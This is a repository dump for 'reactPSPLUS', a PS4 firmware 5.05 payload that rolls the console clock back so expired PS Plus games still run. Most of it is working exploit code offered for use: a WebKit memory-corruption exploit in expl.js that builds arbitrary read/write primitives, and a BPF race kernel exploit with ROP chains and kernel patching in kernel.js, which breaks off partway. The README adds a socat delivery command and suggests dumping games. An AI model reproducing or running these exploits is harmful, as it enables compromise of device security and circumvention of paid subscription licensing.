├── .gitignore
├── LICENSE
├── Makefile
├── README.md
├── source
    └── main.c
└── www
    ├── README.md
    ├── expl.js
    ├── index.html
    ├── kernel.js
    ├── reactPSPlus.js
    ├── rop.js
    ├── syscalls.js
    └── userland.js


/.gitignore:
--------------------------------------------------------------------------------
1 | /build/
2 | *.bin
3 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2018 
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
 1 | LIBPS4	:=	$(PS4SDK)/libPS4
 2 | 
 3 | TEXT	:=	0x926200000
 4 | DATA	:=	0x926300000
 5 | 
 6 | CC		:=	gcc
 7 | AS		:=	gcc
 8 | OBJCOPY	:=	objcopy
 9 | ODIR	:=	build
10 | SDIR	:=	source
11 | IDIRS	:=	-I$(LIBPS4)/include -I. -Iinclude
12 | LDIRS	:=	-L$(LIBPS4) -L. -Llib
13 | CFLAGS	:=	$(IDIRS) -O3 -std=gnu11 -fno-builtin -nostartfiles -nostdlib -Wall -masm=intel -march=btver2 -mtune=btver2 -m64 -mabi=sysv -mcmodel=large
14 | SFLAGS	:=	-nostartfiles -nostdlib -masm=intel -march=btver2 -mtune=btver2 -m64 -mabi=sysv -mcmodel=large
15 | LFLAGS	:=	$(LDIRS) -Xlinker -T $(LIBPS4)/linker.x -Wl,--build-id=none -Ttext=$(TEXT) -Tdata=$(DATA)
16 | CFILES	:=	$(wildcard $(SDIR)/*.c)
17 | SFILES	:=	$(wildcard $(SDIR)/*.s)
18 | OBJS	:=	$(patsubst $(SDIR)/%.c, $(ODIR)/%.o, $(CFILES)) $(patsubst $(SDIR)/%.s, $(ODIR)/%.o, $(SFILES))
19 | 
20 | LIBS	:=	-lPS4
21 | 
22 | TARGET = $(shell basename $(CURDIR)).bin
23 | 
24 | $(TARGET): $(ODIR) $(OBJS)
25 | 	$(CC) $(LIBPS4)/crt0.s $(ODIR)/*.o -o temp.t $(CFLAGS) $(LFLAGS) $(LIBS)
26 | 	$(OBJCOPY) -R .sc_rop temp.t temp.u
27 | 	$(OBJCOPY) -O binary temp.u $(TARGET)
28 | 	rm -f temp.t temp.u
29 | 
30 | $(ODIR)/%.o: $(SDIR)/%.c
31 | 	$(CC) -c -o $@ $< $(CFLAGS)
32 | 
33 | $(ODIR)/%.o: $(SDIR)/%.s
34 | 	$(AS) -c -o $@ $< $(SFLAGS)
35 | 
36 | $(ODIR):
37 | 	@mkdir $@
38 | 
39 | .PHONY: clean
40 | 
41 | clean:
42 | 	rm -f $(TARGET) $(ODIR)/*.o
43 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # reactPSPLUS
 2 | 
 3 | A simple code that will reset PS4 internal clock back to 2013 thus in turn activating PS+ Games that has been previously or are currently on the console
 4 | 
 5 | ## Build
 6 | 
 7 | The code has been currently tested to build using [xvortex/ps4-payload-sdk](https://github.com/xvortex/ps4-payload-sdk)
 8 | however, i see no reason it wouldnt build with cturt or idc's sdk.
 9 | To add, the code is rather simple it can be easily ported to any other current SDK or even future SDK(s)
10 | 
11 | ## Download
12 | [reactPSPLUS.bin](https://github.com/Thunder07/reactPSPLUS/releases)
13 | 
14 | ## Requirement
15 | 
16 | * PS4 must (at the moment) be on 5.05 update.
17 | * have a payload loader running (aka http://crack.bargains/505k/ open twice until you see `Awaiting Payload...`)
18 |   * or any other means of running this code on PS4
19 | 
20 | ## Usage
21 | send the payload to the PS4 using socat (note `192.168.1.1` should be changed to PS4 IP address)
22 | ```
23 | socat FILE:reactPSPLUS.bin TCP:192.168.1.1:9020
24 | ```
25 | 
26 | ## Notes
27 | the payload would set the internal clock to 2013 and your PS+ games would start working,
28 | you wouldn't even need to have HEN enabled to use these games since they're legit games and would work normally like any digital game,
29 | if you're not connected to the internet, you will not need to run this exploit again.
30 | it might be worthwhile dumping your games to make sure you never lose access to them.
31 | 


--------------------------------------------------------------------------------
/source/main.c:
--------------------------------------------------------------------------------
 1 | #include "types.h"
 2 | 
 3 | uint64_t __readmsr(unsigned long __register)
 4 | {
 5 | 	unsigned long __edx;
 6 | 	unsigned long __eax;
 7 | 	__asm__ ("rdmsr" : "=d"(__edx), "=a"(__eax) : "c"(__register));
 8 | 	return (((uint64_t)__edx) << 32) | (uint64_t)__eax;
 9 | }
10 | 
11 | void resetTime()
12 | {
13 | 	uint8_t* kernel_base = (uint8_t*)(__readmsr(0xC0000082) - 0x1C0);
14 | 	// Note somewhere between 1.76 and 5.05 `sceSblSrtcSetTime()` was changed and few extra checks have been added using samu
15 | 	// So if you're backporting this you may not need or even find `sceSblSrtcClearTimeDifference()`
16 | 	// Finally `sceSblSrtcClearTimeDifference()` is also named `sceSblSrtcReset()` when the 1st argument is 15
17 | 	void(*sceSblSrtcClearTimeDifference)(uint64_t) = (void*)(kernel_base + 0x634690);
18 | 	void(*sceSblSrtcSetTime)(uint64_t) = (void*)(kernel_base + 0x634090);
19 | 	sceSblSrtcClearTimeDifference(15);
20 | 	sceSblSrtcSetTime(14861963);
21 | }
22 | 
23 | int _main(void)
24 | {
25 | 	syscall(11, resetTime);
26 | 	return 0;
27 | }
28 | 


--------------------------------------------------------------------------------
/www/README.md:
--------------------------------------------------------------------------------
1 | # PS4 5.05 reactPSPLUS
2 | This webpage is based on https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit with Mira & HEN removed, it was repurposed to serve reactPSPlus web interface.


--------------------------------------------------------------------------------
/www/expl.js:
--------------------------------------------------------------------------------
  1 | function makeid() {
  2 |     var text = "";
  3 |     var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  4 | 
  5 |     for (var i = 0; i < 8; i++)
  6 |         text += possible.charAt(Math.floor(Math.random() * possible.length));
  7 | 
  8 |     return text;
  9 | };
 10 | 
 11 | var instancespr = [];
 12 | 
 13 | for (var i = 0; i < 4096; i++) {
 14 |     instancespr[i] = new Uint32Array(1);
 15 |     instancespr[i][makeid()] = 50057; /* spray 4-field Object InstanceIDs */
 16 | }
 17 | 
 18 | var _dview;
 19 | 
 20 | function u2d(low, hi) {
 21 |     if (!_dview) _dview = new DataView(new ArrayBuffer(16));
 22 |     _dview.setUint32(0, hi);
 23 |     _dview.setUint32(4, low);
 24 |     return _dview.getFloat64(0);
 25 | }
 26 | var dgc = function () {
 27 |     for (var i = 0; i < 0x100; i++) {
 28 |         new ArrayBuffer(0x100000);
 29 |     }
 30 | }
 31 | 
 32 | function int64(low, hi) {
 33 |     this.low = (low >>> 0);
 34 |     this.hi = (hi >>> 0);
 35 | 
 36 |     this.add32inplace = function (val) {
 37 |         var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
 38 |         var new_hi = (this.hi >>> 0);
 39 | 
 40 |         if (new_lo < this.low) {
 41 |             new_hi++;
 42 |         }
 43 | 
 44 |         this.hi = new_hi;
 45 |         this.low = new_lo;
 46 |     }
 47 | 
 48 |     this.add32 = function (val) {
 49 |         var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
 50 |         var new_hi = (this.hi >>> 0);
 51 | 
 52 |         if (new_lo < this.low) {
 53 |             new_hi++;
 54 |         }
 55 | 
 56 |         return new int64(new_lo, new_hi);
 57 |     }
 58 | 
 59 |     this.sub32 = function (val) {
 60 |         var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
 61 |         var new_hi = (this.hi >>> 0);
 62 | 
 63 |         if (new_lo > (this.low) & 0xFFFFFFFF) {
 64 |             new_hi--;
 65 |         }
 66 | 
 67 |         return new int64(new_lo, new_hi);
 68 |     }
 69 | 
 70 |     this.sub32inplace = function (val) {
 71 |         var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
 72 |         var new_hi = (this.hi >>> 0);
 73 | 
 74 |         if (new_lo > (this.low) & 0xFFFFFFFF) {
 75 |             new_hi--;
 76 |         }
 77 | 
 78 |         this.hi = new_hi;
 79 |         this.low = new_lo;
 80 |     }
 81 | 
 82 |     this.and32 = function (val) {
 83 |         var new_lo = this.low & val;
 84 |         var new_hi = this.hi;
 85 |         return new int64(new_lo, new_hi);
 86 |     }
 87 | 
 88 |     this.and64 = function (vallo, valhi) {
 89 |         var new_lo = this.low & vallo;
 90 |         var new_hi = this.hi & valhi;
 91 |         return new int64(new_lo, new_hi);
 92 |     }
 93 | 
 94 |     this.toString = function (val) {
 95 |         val = 16;
 96 |         var lo_str = (this.low >>> 0).toString(val);
 97 |         var hi_str = (this.hi >>> 0).toString(val);
 98 | 
 99 |         if (this.hi == 0)
100 |             return lo_str;
101 |         else
102 |             lo_str = zeroFill(lo_str, 8)
103 | 
104 |         return hi_str + lo_str;
105 |     }
106 | 
107 |     this.toPacked = function () {
108 |         return {
109 |             hi: this.hi,
110 |             low: this.low
111 |         };
112 |     }
113 | 
114 |     this.setPacked = function (pck) {
115 |         this.hi = pck.hi;
116 |         this.low = pck.low;
117 |         return this;
118 |     }
119 | 
120 |     return this;
121 | }
122 | 
123 | function zeroFill(number, width) {
124 |     width -= number.toString().length;
125 | 
126 |     if (width > 0) {
127 |         return new Array(width + (/\./.test(number) ? 2 : 1)).join('0') + number;
128 |     }
129 | 
130 |     return number + ""; // always return a string
131 | }
132 | 
133 | var nogc = [];
134 | 
135 | var fail = function () {
136 |     alert.apply(null, arguments);
137 |     throw "fail";
138 | }
139 | 
140 | // Target JSObject for overlap
141 | var tgt = {
142 |     a: 0,
143 |     b: 0,
144 |     c: 0,
145 |     d: 0
146 | }
147 | 
148 | var y = new ImageData(1, 0x4000)
149 | postMessage("", "*", [y.data.buffer]);
150 | 
151 | // Spray properties to ensure object is fastmalloc()'d and can be found easily later
152 | var props = {};
153 | 
154 | for (var i = 0;
155 |     (i < (0x4000 / 2));) {
156 |     props[i++] = {
157 |         value: 0x42424242
158 |     };
159 |     props[i++] = {
160 |         value: tgt
161 |     };
162 | }
163 | 
164 | var foundLeak = undefined;
165 | var foundIndex = 0;
166 | var maxCount = 0x100;
167 | 
168 | while (foundLeak == undefined && maxCount > 0) {
169 |     maxCount--;
170 | 
171 |     history.pushState(y, "");
172 | 
173 |     Object.defineProperties({}, props);
174 | 
175 |     var leak = new Uint32Array(history.state.data.buffer);
176 | 
177 |     for (var i = 0; i < leak.length - 6; i++) {
178 |         if (
179 |             leak[i] == 0x42424242 &&
180 |             leak[i + 0x1] == 0xFFFF0000 &&
181 |             leak[i + 0x2] == 0x00000000 &&
182 |             leak[i + 0x3] == 0x00000000 &&
183 |             leak[i + 0x4] == 0x00000000 &&
184 |             leak[i + 0x5] == 0x00000000 &&
185 |             leak[i + 0x6] == 0x0000000E &&
186 |             leak[i + 0x7] == 0x00000000 &&
187 |             leak[i + 0xA] == 0x00000000 &&
188 |             leak[i + 0xB] == 0x00000000 &&
189 |             leak[i + 0xC] == 0x00000000 &&
190 |             leak[i + 0xD] == 0x00000000 &&
191 |             leak[i + 0xE] == 0x0000000E &&
192 |             leak[i + 0xF] == 0x00000000
193 |         ) {
194 |             foundIndex = i;
195 |             foundLeak = leak;
196 |             break;
197 |         }
198 |     }
199 | }
200 | 
201 | if (!foundLeak) {
202 |     failed = true
203 |     fail("Failed to find leak!")
204 | }
205 | 
206 | var firstLeak = Array.prototype.slice.call(foundLeak, foundIndex, foundIndex + 0x40);
207 | var leakJSVal = new int64(firstLeak[8], firstLeak[9]);
208 | 
209 | Array.prototype.__defineGetter__(100, () => 1);
210 | 
211 | var f = document.body.appendChild(document.createElement('iframe'));
212 | var a = new f.contentWindow.Array(13.37, 13.37);
213 | var b = new f.contentWindow.Array(u2d(leakJSVal.low + 0x10, leakJSVal.hi), 13.37);
214 | 
215 | var master = new Uint32Array(0x1000);
216 | var slave = new Uint32Array(0x1000);
217 | var leakval_u32 = new Uint32Array(0x1000);
218 | var leakval_helper = [slave, 2, 3, 4, 5, 6, 7, 8, 9, 10];
219 | 
220 | // Create fake ArrayBufferView
221 | tgt.a = u2d(2048, 0x1602300);
222 | tgt.b = 0;
223 | tgt.c = leakval_helper;
224 | tgt.d = 0x1337;
225 | 
226 | var c = Array.prototype.concat.call(a, b);
227 | document.body.removeChild(f);
228 | var hax = c[0];
229 | c[0] = 0;
230 | 
231 | tgt.c = c;
232 | 
233 | hax[2] = 0;
234 | hax[3] = 0;
235 | 
236 | Object.defineProperty(Array.prototype, 100, {
237 |     get: undefined
238 | });
239 | 
240 | tgt.c = leakval_helper;
241 | var butterfly = new int64(hax[2], hax[3]);
242 | butterfly.low += 0x10;
243 | 
244 | tgt.c = leakval_u32;
245 | var lkv_u32_old = new int64(hax[4], hax[5]);
246 | hax[4] = butterfly.low;
247 | hax[5] = butterfly.hi;
248 | // Setup read/write primitive
249 | 
250 | tgt.c = master;
251 | hax[4] = leakval_u32[0];
252 | hax[5] = leakval_u32[1];
253 | 
254 | var addr_to_slavebuf = new int64(master[4], master[5]);
255 | tgt.c = leakval_u32;
256 | hax[4] = lkv_u32_old.low;
257 | hax[5] = lkv_u32_old.hi;
258 | 
259 | tgt.c = 0;
260 | hax = 0;
261 | 
262 | var prim = {
263 |     write8: function (addr, val) {
264 |         master[4] = addr.low;
265 |         master[5] = addr.hi;
266 | 
267 |         if (val instanceof int64) {
268 |             slave[0] = val.low;
269 |             slave[1] = val.hi;
270 |         } else {
271 |             slave[0] = val;
272 |             slave[1] = 0;
273 |         }
274 | 
275 |         master[4] = addr_to_slavebuf.low;
276 |         master[5] = addr_to_slavebuf.hi;
277 |     },
278 | 
279 |     write4: function (addr, val) {
280 |         master[4] = addr.low;
281 |         master[5] = addr.hi;
282 | 
283 |         slave[0] = val;
284 | 
285 |         master[4] = addr_to_slavebuf.low;
286 |         master[5] = addr_to_slavebuf.hi;
287 |     },
288 | 
289 |     read8: function (addr) {
290 |         master[4] = addr.low;
291 |         master[5] = addr.hi;
292 | 
293 |         var rtv = new int64(slave[0], slave[1]);
294 | 
295 |         master[4] = addr_to_slavebuf.low;
296 |         master[5] = addr_to_slavebuf.hi;
297 | 
298 |         return rtv;
299 |     },
300 | 
301 |     read4: function (addr) {
302 |         master[4] = addr.low;
303 |         master[5] = addr.hi;
304 | 
305 |         var rtv = slave[0];
306 | 
307 |         master[4] = addr_to_slavebuf.low;
308 |         master[5] = addr_to_slavebuf.hi;
309 | 
310 |         return rtv;
311 |     },
312 | 
313 |     leakval: function (jsval) {
314 |         leakval_helper[0] = jsval;
315 |         var rtv = this.read8(butterfly);
316 |         this.write8(butterfly, new int64(0x41414141, 0xffff0000));
317 | 
318 |         return rtv;
319 |     },
320 | 
321 |     createval: function (jsval) {
322 |         this.write8(butterfly, jsval);
323 |         var rt = leakval_helper[0];
324 |         this.write8(butterfly, new int64(0x41414141, 0xffff0000));
325 |         return rt;
326 |     }
327 | };
328 | 
329 | window.primitives = prim;
330 | if (window.postExpl) window.postExpl();
331 | 


--------------------------------------------------------------------------------
/www/index.html:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html>
  3 | <head>
  4 |   <title>PS4Brew 5.05</title>
  5 |   <meta name="viewport" content="width=device-width, initial-scale=1">
  6 |   <style>
  7 |     .loader {
  8 |       position: absolute;
  9 |       left: 50%;
 10 |       top: 50%;
 11 |       margin: -75px 0 0 -75px;
 12 | 
 13 |       border: 10px solid #f3f3f3;
 14 |       border-radius: 50%;
 15 |       border-top: 10px solid #044595;
 16 |       border-left: 10px solid #044595;
 17 |       width: 120px;
 18 |       height: 120px;
 19 | 
 20 |       -webkit-animation: spin 1s linear infinite;
 21 |     }
 22 | 
 23 |     .info {
 24 |       overflow: hidden;
 25 |       position: fixed;
 26 |       position: absolute;
 27 |       top: 50%;
 28 |       left: 50%;
 29 | 
 30 |       font-size: 45px;
 31 |       font-family: sans-serif;
 32 | 
 33 |       transform: translate(-50%, -50%);
 34 |     }
 35 | 
 36 |     .credits {
 37 |       overflow: hidden;
 38 |       position: fixed;
 39 |       position: absolute;
 40 |       top: 90%;
 41 |       left: 50%;
 42 | 
 43 |       font-size: 16px;
 44 |       font-family: sans-serif;
 45 |       text-align: center;
 46 | 
 47 |       transform: translate(-50%, -90%);
 48 |     }
 49 | 
 50 |     @-webkit-keyframes spin {
 51 |       0% { -webkit-transform: rotate(0deg); }
 52 |       100% { -webkit-transform: rotate(360deg); }
 53 |     }
 54 |   </style>
 55 | </head>
 56 | <body style="margin:0;">
 57 |   <script>
 58 |     window.didload = 0;
 59 |     window.didpost = 0;
 60 | 
 61 |     window.onload = function () {
 62 |       window.didload = 1;
 63 |       if (window.didpost == 1)
 64 |         setTimeout(window.stage2, 1500);
 65 |     }
 66 |     window.postExpl = function () {
 67 |       window.didpost = 1;
 68 |       if (window.didload == 1)
 69 |         setTimeout(window.stage2, 1500);
 70 |     }
 71 | 
 72 |     function allset() {
 73 |       document.getElementById("loader").style.display = "none";
 74 |       document.getElementById("allset").style.display = "block";
 75 |     }
 76 | 
 77 |     function awaitpl() {
 78 |       document.getElementById("loader").style.display = "none";
 79 |       document.getElementById("awaiting").style.display = "block";
 80 |     }
 81 | 
 82 |     function fail(info) {
 83 |       document.getElementById("loader").style.display = "none";
 84 |       document.getElementById("fail").style.display = "block";
 85 |     }
 86 | 
 87 |     function showtime() {
 88 |       document.getElementById("loader").style.display = "none";
 89 |       document.getElementById("date").style.display = "block";
 90 |     }
 91 |     function settime() {
 92 |       var year = document.getElementById("year").value;
 93 |       var month = document.getElementById("month").value;
 94 |       var day = document.getElementById("day").value;
 95 |       var hours = document.getElementById("hour").value;
 96 |       var minutes = document.getElementById("minute").value;
 97 |       window.setRTC(year, month, day, hours, minutes, 0);
 98 |     }
 99 |   </script>
100 | 
101 |   <div id="loader" class="loader"></div>
102 | 
103 |     <div id="date" class="info" style="display:none;">
104 | 
105 |       Year:
106 |       <input type="number" id="year" name="year" min="1" max="3000" value="2018">
107 | 
108 |       Month:
109 |       <input type="number" id="month" name="month" min="1" max="12" value="06">
110 | 
111 |       Day:
112 |       <input type="number" id="day" name="day" min="1" max="31" value="21">
113 | 
114 |       <br/>
115 | 
116 |       Hour:
117 |       <input type="number" id="hour" name="hour" min="0" max="24" value="06">
118 | 
119 |       Minute:
120 |       <input type="number" id="minute" name="minute" min="0" max="60" value="5">
121 |       <button onclick="settime();">Settime</button>
122 |     </div>
123 | 
124 |   <div id="awaiting" class="info" style="display:none;">
125 |     Awaiting Payload...
126 |   </div>
127 | 
128 |   <div id="allset" class="info" style="display:none;">
129 |     You're all set!
130 |   </div>
131 | 
132 |   <div id="fail" class="info" style="display:none;">
133 |     Something went wrong :(
134 |   </div>
135 | 
136 |   <div id="badfw" class="info" style="display:none;">
137 |     Only firmware 5.05 is supported!
138 |   </div>
139 | 
140 |   <div id="footer" class="credits">
141 |     <ul style="list-style: none;padding-left:0">
142 |       <li>Bug from qwertyoruiopz</li>
143 |       <li>Homebrew thanks to flatz, xvortex</li>
144 |       <li>Implementation by specter</li>
145 |       <li>&lt3 OpenOrbis Team</li>
146 |     </ul>
147 |   </div>
148 | 
149 |   <script src="./rop.js"></script>
150 |   <script src="./syscalls.js"></script>
151 |   <script src="./expl.js"></script>
152 |   <script src="./userland.js"></script>
153 |   <script src="./reactPSPlus.js"></script>
154 |   <pre id="console"></pre>
155 | </body>
156 | </html>
157 | 


--------------------------------------------------------------------------------
/www/kernel.js:
--------------------------------------------------------------------------------
  1 | function kernExploit() {
  2 |   try {
  3 |     var offsetToWebKit = function (o) {
  4 |       return window.webKitBase.add32(o);
  5 |     }
  6 | 
  7 |     var fd = p.syscall("sys_open", p.stringify("/dev/bpf0"), 2).low;
  8 |     var fd1 = p.syscall("sys_open", p.stringify("/dev/bpf0"), 2).low; 
  9 | 
 10 |     if (fd == (-1 >>> 0)) {
 11 |       throw "Failed to open first bpf device!"
 12 |     }
 13 | 
 14 |     // Write BPF programs
 15 |     var bpf_valid = p.malloc32(0x4000);
 16 |     var bpf_spray = p.malloc32(0x4000);
 17 |     var bpf_valid_u32  = bpf_valid.backing;
 18 | 
 19 |     var bpf_valid_prog = p.malloc(0x40);
 20 |     p.write8(bpf_valid_prog, 0x800 / 8)
 21 |     p.write8(bpf_valid_prog.add32(8), bpf_valid)
 22 | 
 23 |     var bpf_spray_prog = p.malloc(0x40);
 24 |     p.write8(bpf_spray_prog, 0x800 / 8)
 25 |     p.write8(bpf_spray_prog.add32(8), bpf_spray)
 26 | 
 27 |     for (var i = 0; i < 0x400;) {
 28 |       bpf_valid_u32[i++] = 6;
 29 |       bpf_valid_u32[i++] = 0;
 30 |     }
 31 | 
 32 |     var rtv = p.syscall("sys_ioctl", fd, 0x8010427B, bpf_valid_prog);
 33 | 
 34 |     if(rtv.low != 0) {
 35 |       throw "Failed to open first bpf device!";
 36 |     }
 37 | 
 38 |     // Spawn thread
 39 |     var spawnthread = function (name, chain) {
 40 |       var longjmp = window.webKitBase.add32(0x14e8);
 41 |       var createThread = window.webKitBase.add32(0x779390);
 42 |       var contextp = p.malloc32(0x2000);
 43 |       var contextz = contextp.backing;
 44 |       contextz[0] = 1337;
 45 |       var thread2 = new rop();
 46 |       thread2.push(window.gadgets["ret"]);
 47 |       thread2.push(window.gadgets["ret"]);
 48 |       thread2.push(window.gadgets["ret"]);
 49 |       thread2.push(window.gadgets["ret"]);
 50 |       chain(thread2);
 51 |       p.write8(contextp, window.gadgets["ret"]);
 52 |       p.write8(contextp.add32(0x10), thread2.stackBase);
 53 |       p.syscall(324, 1);
 54 |       var retv = function () { p.fcall(createThread, longjmp, contextp, p.stringify(name)); }
 55 |       window.nogc.push(contextp);
 56 |       window.nogc.push(thread2);
 57 |       return retv;
 58 |     }
 59 | 
 60 |     var interrupt1, loop1;
 61 |     var interrupt2, loop2;
 62 |     var sock = p.syscall(97, 2, 2);
 63 |     var kscratch = p.malloc32(0x1000);
 64 | 
 65 |     // Racing thread
 66 |     var start1 = spawnthread("GottaGoFast", function (thread2) {
 67 |       interrupt1 = thread2.stackBase;
 68 |       thread2.push(window.gadgets["ret"]);
 69 |       thread2.push(window.gadgets["ret"]);
 70 |       thread2.push(window.gadgets["ret"]);
 71 | 
 72 |       thread2.push(window.gadgets["pop rdi"]);
 73 |       thread2.push(fd);
 74 |       thread2.push(window.gadgets["pop rsi"]);
 75 |       thread2.push(0x8010427B);
 76 |       thread2.push(window.gadgets["pop rdx"]);
 77 |       thread2.push(bpf_valid_prog);
 78 |       thread2.push(window.gadgets["pop rsp"]);
 79 |       thread2.push(thread2.stackBase.add32(0x800));
 80 |       thread2.count = 0x100;
 81 |       var cntr = thread2.count;
 82 |       thread2.push(window.syscalls[54]); // ioctl
 83 |       thread2.push_write8(thread2.stackBase.add32(cntr * 8), window.syscalls[54]); // restore ioctl
 84 | 
 85 |       thread2.push(window.gadgets["pop rdi"]);
 86 |       var wherep = thread2.pushSymbolic();
 87 |       thread2.push(window.gadgets["pop rsi"]);
 88 |       var whatp = thread2.pushSymbolic();
 89 |       thread2.push(window.gadgets["mov [rdi], rsi"]);
 90 | 
 91 |       thread2.push(window.gadgets["pop rsp"]);
 92 | 
 93 |       loop1 = thread2.stackBase.add32(thread2.count * 8);
 94 |       thread2.push(0x41414141);
 95 | 
 96 |       thread2.finalizeSymbolic(wherep, loop1);
 97 |       thread2.finalizeSymbolic(whatp, loop1.sub32(8));
 98 |     });
 99 | 
100 |     // start setting up chains
101 |     var krop = new rop();
102 |     var race = new rop();
103 | 
104 |     /**
105 |       * Qwerty Madness!
106 |       * -
107 |       * This section contains magic. It's for bypassing Sony's ghetto "SMAP".
108 |       * Need to be a level 99 mage to understand this completely (not really but kinda). ~ Specter
109 |      **/
110 | 
111 |     var ctxp  = p.malloc32(0x2000);
112 |     var ctxp1 = p.malloc32(0x2000);
113 |     var ctxp2 = p.malloc32(0x2000);
114 | 
115 |     p.write8(bpf_spray.add32(16), ctxp);
116 |     p.write8(ctxp.add32(0x50), 0);
117 |     p.write8(ctxp.add32(0x68), ctxp1);
118 |     var stackshift_from_retaddr = 0;
119 |     p.write8(ctxp1.add32(0x10), offsetToWebKit(0x12A19CD)); // sub rsp
120 | 
121 |     stackshift_from_retaddr += 8 + 0x58;
122 | 
123 |     p.write8(ctxp.add32(0), ctxp2);
124 |     p.write8(ctxp.add32(0x10), ctxp2.add32(8));
125 |     p.write8(ctxp2.add32(0x7d0), offsetToWebKit(0x6EF4E5)); // mov rdi, [rdi+0x10]
126 | 
127 |     var iterbase = ctxp2;
128 | 
129 |     for (var i = 0; i < 0xf; i++) {
130 |       p.write8(iterbase, offsetToWebKit(0x12A19CD)); // sub rsp
131 |       stackshift_from_retaddr += 8 + 0x58;
132 |       p.write8(iterbase.add32(0x7d0 + 0x20), offsetToWebKit(0x6EF4E5)); // mov rdi, [rdi+0x10]
133 |       p.write8(iterbase.add32(8), iterbase.add32(0x20));
134 |       p.write8(iterbase.add32(0x18), iterbase.add32(0x20 + 8))
135 |       iterbase = iterbase.add32(0x20);
136 |     }
137 | 
138 |     var raxbase = iterbase;
139 |     var rdibase = iterbase.add32(8);
140 |     var memcpy = get_jmptgt(webKitBase.add32(0xF8));
141 |     memcpy = p.read8(memcpy);
142 | 
143 |     p.write8(raxbase, offsetToWebKit(0x15CA41B));
144 |     stackshift_from_retaddr += 8;
145 | 
146 |     p.write8(rdibase.add32(0x70), offsetToWebKit(0x1284834));
147 |     stackshift_from_retaddr += 8;
148 | 
149 |     p.write8(rdibase.add32(0x18), rdibase);
150 |     p.write8(rdibase.add32(8), krop.stackBase);
151 |     p.write8(raxbase.add32(0x30), window.gadgets["mov rbp, rsp"]);
152 |     p.write8(rdibase, raxbase);
153 |     p.write8(raxbase.add32(0x420), offsetToWebKit(0x272961)); // lea rdi, [rbp - 0x28]
154 |     p.write8(raxbase.add32(0x40), memcpy.add32(0xC2 - 0x90));
155 |     var topofchain = stackshift_from_retaddr + 0x28;
156 |     p.write8(rdibase.add32(0xB0), topofchain);
157 | 
158 |     for (var i = 0; i < 0x1000 / 8; i++) {
159 |       p.write8(krop.stackBase.add32(i * 8), window.gadgets["ret"]);
160 |     }
161 | 
162 |     krop.count = 0x10;
163 | 
164 |     /**
165 |       * End of Qwerty madness
166 |      **/
167 | 
168 |     /**
169 |       * Bit of info:
170 |       * -
171 |       * The "kchain" buffer is used to store the kernel ROP chain, and is managed by the "krop" class defined in rop.js.
172 |       * There are also two helper functions for the class, "kpatch" and "kpatch2" for patching the kernel defined below.
173 |       * The "kchainstack" buffer should not be used directly as it is managed by the "krop" class!
174 |       * -
175 |       * The "kscratch" buffer is used to save context. The layout is as follows:
176 |       * kscratch + 0x00: contents of rax register (points to kernel base + 0x16DB6C)
177 |       * kscratch + 0x08: pointer to function stub that manipulates cr0 (mov rax, cr0; or rax, 5002Ah; mov cr0, rax; ret)
178 |       * kscratch + 0x10: contents of cr0 before the write protection bit is flipped for kernel patching
179 |       * kscratch + 0x18: pointer to kscratch
180 |       * kscratch + 0x40: "pop rax" gadget
181 |       * kscratch + 0x420: "pop rdi" gadget
182 |      **/
183 | 
184 |     // Helper function for patching kernel
185 |     var kpatch = function(offset, qword) {
186 |       krop.push(window.gadgets["pop rax"]);
187 |       krop.push(kscratch);
188 |       krop.push(window.gadgets["mov rax, [rax]"]);
189 |       krop.push(window.gadgets["pop rsi"]);
190 |       krop.push(offset);
191 |       krop.push(window.gadgets["add rax, rsi"]);
192 |       krop.push(window.gadgets["pop rsi"]);
193 |       krop.push(qword);
194 |       krop.push(window.gadgets["mov [rax], rsi"]);
195 |     }
196 | 
197 |     // Helper function for patching kernel with information from kernel.text
198 |     var kpatch2 = function(offset, offset2) {
199 |       krop.push(window.gadgets["pop rax"]);
200 |       krop.push(kscratch);
201 |       krop.push(window.gadgets["mov rax, [rax]"]);
202 |       krop.push(window.gadgets["pop rsi"]);
203 |       krop.push(offset);
204 |       krop.push(window.gadgets["add rax, rsi"]);
205 |       krop.push(window.gadgets["mov rdi, rax"]);
206 |       krop.push(window.gadgets["pop rax"]);
207 |       krop.push(kscratch);
208 |       krop.push(window.gadgets["mov rax, [rax]"]);
209 |       krop.push(window.gadgets["pop rsi"]);
210 |       krop.push(offset2);
211 |       krop.push(window.gadgets["add rax, rsi"]);
212 |       krop.push(window.gadgets["mov [rdi], rax"]);
213 |     }
214 | 
215 |     p.write8(kscratch.add32(0x420), window.gadgets["pop rdi"]);
216 |     p.write8(kscratch.add32(0x40), window.gadgets["pop rax"]);
217 |     p.write8(kscratch.add32(0x18), kscratch);
218 | 
219 |     krop.push(window.gadgets["pop rdi"]);
220 |     krop.push(kscratch.add32(0x18));
